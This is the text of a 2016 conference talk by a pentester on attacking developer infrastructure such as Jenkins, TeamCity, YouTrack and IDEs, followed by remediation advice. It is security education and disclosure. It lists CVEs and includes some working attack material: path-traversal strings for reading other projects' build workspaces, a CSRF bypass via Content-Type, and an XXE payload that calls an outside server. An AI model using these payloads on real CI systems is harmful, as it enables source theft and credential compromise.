[CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs

Andrey Plastunov
Simple bugs to pwn the devs

About
Pentester at Digital Security [DSEC.RU]
@DSecRU
@plastunovaa
@osakaaa
a.plastunov@dsec.ru

Source code Issue
App
IDEs
CI
Source code
Components: Scheme

An integrated development environment (IDE) is a software application that
provides comprehensive facilities to computer programmers for software
development. An IDE normally consists of a source code editor, build
automation tools and a debugger. Most modern IDEs have intelligent code
completion. (с) Wikipedia
● Consumes user input
● Produces sources
● Builds sources
● Uses plugins for integration with other tools
● Has UI
Components: IDE

● Builds sources
● Has UI
● (Even the IDE!) Can be the target of an attack
Components: IDE

Components: IDE
● Builds sources
● Has UI
● Can be target of an attack
Jetbrains Intellij based IDEs prone to CSRF vulnerability which allows
attacker to access local file system from a malicious website
JetBrain’s advisory: https://blog.jetbrains.com/blog/2016/05/11/security-
update-for-intellij-based-ides-v2016-1-and-older-versions/
Example

A component of software configuration management, version control, also
known as revision control or source control, is the management of changes to
documents, computer programs, large web sites, and other collections of
information
● Stores source code + additional info (not always trusted)
● Has UI
Components: Version control

information
● Stores source code + additional info (not always trusted)
● Has UI
● Will be the target of attack

information
● Stores user supplied data (not always trusted)
● Has UI
● Will be the target of attack
A number of CVEs and other vulns in:
● GIT itself
● GIT-based repositories (Gitlub, GitHub etc)
The same thing for less popular Mercurial and SVN
Example

Continuous integration (CI) is the practice, in software engineering, of merging
all developer working copies to a shared mainline several times a day
● Executes (!) user supplied data
● Stores credentials and other identity data
● Has UI
Components: CI system

Continuous integration (CI) is the practice, in software engineering, of merging
all developer working copies to a shared mainline several times a day
● Executes (!) user supplied data
● Stores credentials and other identity data
● Has UI
● The most expected to be the target of attack
Components: CI system

An issue tracking system (also ITS, trouble ticket system, support ticket,
request management or incident ticket system) is a computer software
package that manages and maintains lists of issues, as needed by an
organization.
● Has UI
Components: Issue trackers

organization.
● Has UI
● Probably will be the target of attack

organization.
● Has UI
● Probably will be the target of attack
A number of CVEs and other vulns in various issue tracking systems
● Latest XXE vulnerability in JetBrains YouTrack as an example of
common WEB bug.
http://blog.jetbrains.com/youtrack/2016/02/important-youtrack-6-5-
17031-update/
● Much more funny example cve-2015-4499 in Bugzilla which allows
escalation of privileges via improper validation of emails
https://blog.perimeterx.com/bugzilla-cve-2015-4499/
Example

1. Directly affects Source codes of your product
2. Works with developer's identity
3. Can provide a great help for attacker during network
infiltration
Why so valuable?

1. The source code itself
Can be stolen
2. Your application’s end users
Can be infected
Goodies: Source code

● Your private (signing) key
Signing malicious code with your keys
● Evading Antiviruses
● Circumventing several security mechanisms on some OS (like
iOS)
Goodies: Developer’s identity

● Elevation of privilege
○ Domain credentials
○ Service credentials
○ SSH keys
...
● Malicious code execution -> full access to your network
Goodies: Network infiltration

Based on the previous slides, we have the following types of
goodies:
● Source code
● Developers identity
● Network-used credentials
● Code execution (e.g. backend access)
Goodies: Summary

Attack surface? Where to look
+ + + -
+ + - -
+ + +++ +
- - + -
Actually, not in scope =)
The information below based on my own experience with dev tools and
may or may not represent your own knowledge.
Also, the distribution of goodies between components based on my
understanding of how each component should work
Disclaimer

Sources Identity
Network
creds
Backend
+ + + -
+ + - -
+ + +++ +
+- - + -
Actually, not in scope =)
Attack surface? Where to look

Attack surface?
The keys to pwn the components

User Interface
● Graphical (mostly web-based) interface to control Master
● (sometimes) API’s and other such stuff
Actually, each component has it
Attack surface?

Plugins
● Various tools to modify base system
Such as:
○ Security plugins
○ Integration plugins
○ Reporting plugins
○ ….
With all this integration stuff, it is very likely, that a component has the
ability to use plugins
Attack surface?

Attack surface?
Why plugins. Demo

[Component specific] Master
● Controls the entire system:
○ Configuration
○ User accounts
○ Plugin management
● Control slaves
● Builds targets
● Temporary hosts builded apps
Attack surface?

[Component specific] Slaves
● Managed by master
● Build targets
● Temporary host builded apps
Attack surface?

Attack surface?
Attack surface!
- That’s attacker

● Vulnerable instances (often with public exploits)
● Default credentials (or their absence)
● Building tools runs under high privileged accounts (root or
system)
● No (or bad) role management
● No sandboxing (isolation)
*based on observation from various pentests
Common configuration problems*

● No isolation on build servers
○ It is possible to access sources of other projects
Just pass something like this to your build script:
../workspace/ - Jenkins Agent’s working dir
../../work/ (buildAgent/work/) - Teamcity Agent’s working dir
A Note on isolation of builds
../workspace/
../../work/ (buildAgent/work/)

● No isolation on build servers
○ It is possible to access sources of other projects
○ In case of Master, possibility to access server
configuration itself
Just pass something like this to your build script:
../workspace/ - Jenkins Agent’s working dir
../../work/ (buildAgent/work/) - Teamcity configuration dir
A Note on isolation of builds
$JENKINS_HOME/
.BuildServer/config/

Jenkins. A number of XSS vectors misusing Jenkins functionality
- Custom web server for user supplied data
- HTML content from code repos
Exploit: link
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
/UserContent/
/job/<ProjectName>/ws/

Jenkins universal CSRF
CVE-2015-7538
Exploit: Change Content-Type for any request to multipart/form-data
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
if (valid || isMultipart(httpRequest)) {
chain.doFilter(request, response);
} else {
LOGGER.log(Level.WARNING, "No valid crumb was
included in request for {0}. Returning {1}.", new
Object[] {httpRequest.getRequestURI(),
HttpServletResponse.SC_FORBIDDEN});

Notorious Java deserialization in Jenkins CLI (command line
interface) deserialization vulnerability
CVE-2015-8103
Affected library: ./webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.
jar
Details and Exploit: What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your
Application Have in Common? This Vulnerability by foxglove security
Payload generator: https://github.com/frohoff/ysoserial
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!

Notorious Java deserialization in Jenkins Xstream parsing
CVE-2016-0792
Details and Exploit: Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792)
by contrast security
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!

TeamCity privilege escalation through IDOR.
CVE-2015-1313
- is accessible even if registration is turned of in
configs
Details and exploit at: https://beyondbinary.io/articles/teamcity-account-creation/
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
/registerUserSubmit.html

YouTrack XXE in user import function
Details: bo0om’s blog + hackerone report 114476 (sadly, both in Russian)
Exploit: Send XML payload via PUT method to URI /rest/import/users?{test}
Example payload:
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
<?xml version="1.0"?>
<!DOCTYPE list [
<!ENTITY % xxe SYSTEM "http://myserver/xxe-test">
%xxe;
]>
<list></list>

Targets
● Source code
● Developer’s identity
● Network-used credentials
● Code execution (e.g. backend access)
Exploitation

● Source code
○ Stealing the sources using lack of isolation between projects
Exploitation

● Source code
○ Stealing the sources using lack of isolation between projects
○ Source code modification (infection)
Exploitation

● Developer’s identity
○ Stealing the identity
Exploitation

● Network Infiltration
○ Gaining credentials
E.g. from local encrypted storage
For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html -
Retrieving the eccryption key via admin script console
○ Gaining backend access
Exploitation

Stealing the source codes and identity.
Demo

● Network Infiltration
○ Gaining credentials
E.g. from local encrypted storage
For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html -
Retrieving the ecryption key via admin script console
○ Gaining backend access
Exploitation

Gaining backend access via simple XSS.
Demo

● Botnets. Small but funny
Exploitation

Official Jenkins CI
Exploitation

Official TeamCity CI
Exploitation

Exploitation
Jenkins on the internet

Exploitation
Jenkins on the internetTeamcity on the internet

Remediations. Summary
● Never rely on default settings
● Never bind to 0.0.0.0
● Never rely on safety of 3rd party components like plugins
● Update your tools as soon as a new security advisory is
published
● Perform additional validation on all user inputs (including
sources)
● Try to isolate projects (Docker?)

[CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs

Recomendados

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Destacado

Destacado (17)

Similar a [CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs

Similar a [CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs (20)

Último

Último (20)

[CONFidence 2016] Andrey Plastunov - Simple bugs to pwn the devs